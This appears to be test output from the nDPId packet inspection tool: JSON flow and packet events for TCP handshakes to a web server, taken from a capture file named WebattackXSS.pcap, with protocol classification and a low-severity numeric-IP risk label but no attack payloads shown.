+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1499347071685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347071685,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gQZAAD4GRMqsEAABwKgKMtBCAFDUJMx6AAAAAKACchCfHAAAAgQFtAQCCAoBOU18AAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1499347071686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347071686,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0EJ9MmhQ1CTMe6AScSCXogAAAgQFtAQCCAoD4x7zATlNfAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1499347071686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347071686,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gQdAAD4GRNGsEAABwKgKMtBCAFDUJMx7fTJoUYAQAOU2qgAAAQEICgE5TXwD4x7z"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347074268,"flow_last_seen":1499347074268,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347074268,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1499347074268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347074268,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NBxAAD4GkbSsEAABwKgKMtBcAFD4fmQdAAAAAKACchDggAAAAgQFtAQCCAoBOVABAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1499347074268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347074268,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Fw80cpV+H5kHqAScSC03QAAAgQFtAQCCAoD4yF4ATlQAQEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1499347074269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347074269,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NB1AAD4GkbusEAABwKgKMtBcAFD4fmQePNHKVoAQAOVT5AAAAQEICgE5UAID4yF4"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347075596,"flow_last_seen":1499347075596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347075596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1499347075596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347075596,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KAdAAD4GncmsEAABwKgKMtBqAFA4KXlJAAAAAKACchCKTwAAAgQFtAQCCAoBOVFOAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1499347075597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347075597,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0GplJM47OCl5SqAScSAxJwAAAgQFtAQCCAoD4yLEATlRTgEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1499347075597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347075597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KAhAAD4GndCsEAABwKgKMtBqAFA4KXlKZSTOPIAQAOXQLgAAAQEICgE5UU4D4yLE"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347078168,"flow_last_seen":1499347078168,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347078168,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1499347078168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347078168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VtlAAD4GbvesEAABwKgKMtCEAFCbYgUIAAAAAKACchCYugAAAgQFtAQCCAoBOVPRAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1499347078168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347078168,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0IRJPKyYm2IFCaAScSB6mgAAAgQFtAQCCAoD4yVHATlT0QEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":949,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1499347078169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347078169,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VtpAAD4Gbv6sEAABwKgKMtCEAFCbYgUJSTysmYAQAOUZogAAAQEICgE5U9ED4yVH"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347079449,"flow_last_seen":1499347079449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347079449,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1499347079449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347079449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81tZAAD4G7vmsEAABwKgKMtCSAFDwQYPHAAAAAKACchDDzQAAAgQFtAQCCAoBOVURAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1499347079449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347079449,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0JKY6hHr8EGDyKAScSDvawAAAgQFtAQCCAoD4yaIATlVEQEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1499347079450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347079450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01tdAAD4G7wCsEAABwKgKMtCSAFDwQYPImOoR7IAQAOWOcwAAAQEICgE5VRED4yaI"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":971,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347080793,"flow_last_seen":1499347080793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347080793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1499347080793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347080793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x4ZAAD4G\/kmsEAABwKgKMtCgAFDV9pHnAAAAAKACchDOmgAAAgQFtAQCCAoBOVZhAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1499347080793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347080793,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0KAcF4FK1faR6KAScSAGXQAAAgQFtAQCCAoD4yfYATlWYQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1499347080794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347080794,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x4dAAD4G\/lCsEAABwKgKMtCgAFDV9pHoHBeBS4AQAOWlZAAAAQEICgE5VmED4yfY"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347082084,"flow_last_seen":1499347082084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347082084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1499347082084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347082084,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rj9AAD4GF5GsEAABwKgKMtCuAFC6z\/mcAAAAAKACchCAvAAAAgQFtAQCCAoBOVejAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":981,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1499347082084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347082084,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0K6mztSPus\/5naAScSDZPwAAAgQFtAQCCAoD4ykaATlXowEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1499347082085,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347082085,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rkBAAD4GF5isEAABwKgKMtCuAFC6z\/mdps7UkIAQAOV4RgAAAQEICgE5V6QD4yka"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347083358,"flow_last_seen":1499347083358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347083358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1499347083358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347083358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81M5AAD4G8QGsEAABwKgKMtC8AFCsV4wsAAAAAKACchD7VwAAAgQFtAQCCAoBOVjiAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1499347083358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347083358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0LzW0\/50rFeMLaAScSD4sQAAAgQFtAQCCAoD4ypZATlY4gEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1499347083359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347083359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01M9AAD4G8QisEAABwKgKMtC8AFCsV4wt1tP+dYAQAOWXuQAAAQEICgE5WOID4ypZ"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347084644,"flow_last_seen":1499347084644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347084644,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1499347084644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347084644,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8o6RAAD4GIiysEAABwKgKMtDKAFAgx\/mHAAAAAKACchAYPgAAAgQFtAQCCAoBOVojAAAAAAEDAwc="} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1499347084644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347084644,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Mrcl6UQIMf5iKAScSBn9wAAAgQFtAQCCAoD4yuaATlaIwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1499347084645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347084645,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0o6VAAD4GIjOsEAABwKgKMtDKAFAgx\/mI3JelEYAQAOUG\/gAAAQEICgE5WiQD4yua"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347087256,"flow_last_seen":1499347087256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347087256,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1499347087256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347087256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8beFAAD4GV++sEAABwKgKMtDkAFAnsDFRAAAAAKACchDW5AAAAgQFtAQCCAoBOVywAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1499347087256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347087256,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0OTlcRoYJ7AxUqAScSCmLwAAAgQFtAQCCAoD4y4nATlcsAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1499347087257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347087257,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0beJAAD4GV\/asEAABwKgKMtDkAFAnsDFS5XEaGYAQAOVFNgAAAQEICgE5XLED4y4n"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347088552,"flow_last_seen":1499347088552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1499347088552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA892FAAD4Gzm6sEAABwKgKMtDyAFAECKqUAAAAAKACchB\/9gAAAgQFtAQCCAoBOV31AAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1499347088552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0PJdbGlkBAiqlaAScSCGtgAAAgQFtAQCCAoD4y9rATld9QEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1499347088553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347088553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA092JAAD4GznWsEAABwKgKMtDyAFAECKqVXWxpZYAQAOUlvgAAAQEICgE5XfUD4y9r"} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1499346956870,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7926,"flow_tot_l4_payload_len":16625,"flow_avg_l4_payload_len":503,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 